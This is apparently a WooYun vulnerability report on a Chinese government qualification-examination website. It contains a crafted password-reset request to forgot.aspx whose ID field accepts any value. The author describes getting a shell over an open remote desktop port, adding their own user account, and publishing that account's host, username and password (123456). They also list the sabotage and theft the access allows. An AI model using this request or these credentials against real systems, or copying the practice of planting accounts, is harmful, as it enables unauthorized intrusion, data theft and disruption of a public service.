WooYun.org

URL：http://zyzg.heca.gov.cn/forgot.aspx
data:__VIEWSTATE=%2FwEPDwUJNjQ1OTI2NjE5D2QWAgIDD2QWAgIDDxYCHgtfIUl0ZW1Db3VudAIKFhRmD2QWBAIBDxYCHgRocmVmBRJEZWZhdWx0LmFzcHg%2FSWQ9NzkWAmYPFQEr5YWz5LqOMjAxMuW5tOS4ree6p%2BawtOW5s%2BiAg%2BivleWQiOagvOiAheKApmQCAg8VARIyMDEzLTktMjIgMTE6MDc6MDJkAgEPZBYEAgEPFgIfAQUSRGVmYXVsdC5hc3B4P0lkPTc4FgJmDxUBM%2BWFs%2BS6juihpeWKnueOsOS7u%2BS4k%2BS4muaKgOacr%2BiBjOWKoeS7u%2BiBjOi1hOagvOKApmQCAg8VAREyMDEzLTktMjIgOTo1Njo0MGQCAg9kFgQCAQ8WAh8BBRJEZWZhdWx0LmFzcHg%2FSWQ9NzcWAmYPFQEr5YWz5LqO5YWs5biDMjAxM%2BW5tOW6puiBjOensOiAg%2BivleWQiOagvOKApmQCAg8VARIyMDEzLTktMTEgMTE6MjU6MjJkAgMPZBYEAgEPFgIfAQUSRGVmYXVsdC5hc3B4P0lkPTcwFgJmDxUBK%2BWFs%2BS6jjIwMTPlubTluqbkuJPkuJrmioDmnK%2FogYzliqHku7vogYzigKZkAgIPFQEQMjAxMy01LTcgODozOTo0MWQCBA9kFgQCAQ8WAh8BBRJEZWZhdWx0LmFzcHg%2FSWQ9NjgWAmYPFQEr5YWz5LqOMjAxM%2BW5tOW6pumdnuWFrOacieWItuS8geS4muS4k%2BS4muKApmQCAg8VAREyMDEzLTUtNiAxNjo1MTo0OGQCBQ9kFgQCAQ8WAh8BBRJEZWZhdWx0LmFzcHg%2FSWQ9NjcWAmYPFQES6KGo5qC85aGr5YaZ5qih5p2%2FZAICDxUBETIwMTMtNS02IDE2OjQ3OjM1ZAIGD2QWBAIBDxYCHwEFEkRlZmF1bHQuYXNweD9JZD02NhYCZg8VATHmraPpq5jnuqflt6XnqIvluIjor4TlrqHmnaHku7blhoDogYzmlLnlrZfvvIgy4oCmZAICDxUBETIwMTMtNS02IDE2OjQ2OjQ5ZAIHD2QWBAIBDxYCHwEFEkRlZmF1bHQuYXNweD9JZD02NRYCZg8VATPpq5jnuqflt6XnqIvluIjjgIHlt6XnqIvluIjor4TlrqHmnaHku7blhoDogYzmlLnigKZkAgIPFQERMjAxMy01LTYgMTY6NDU6MjJkAggPZBYEAgEPFgIfAQUSRGVmYXVsdC5hc3B4P0lkPTYyFgJmDxUBMeWKqeeQhuW3peeoi%2BW4iOivhOWuoeadoeS7tuWGgOiBjOaUueWKnuWtl%2B%2B8iDLigKZkAgIPFQESMjAxMi0xMC0xMiA4OjUyOjAxZAIJD2QWBAIBDxYCHwEFEkRlZmF1bHQuYXNweD9JZD02ORYCZg8VARnms6jlhowv55m75b2V5biu5Yqp5paH5Lu2ZAICDxUBETIwMTMtNS02IDE2OjUzOjQ2ZGQ%3D&txtEmail=safe3q%40gmail.com&LoginButton=%E6%89%BE%E5%9B%9E%E5%AF%86%E7%A0%81&txtIDNumber=88952634(此处可为任意数字)



经过端口扫描  发现3389开的
权限那么高 可以cmd shell  可以加用户之类的   我加了一个  （怎么加的 你懂得）
远程桌面  zyzg.heca.gov.cn
用户名 ：123456 密码如用户名 





可以偷窥 暂停网站的运行 删除重要文件 窃取有关信息  等等等等等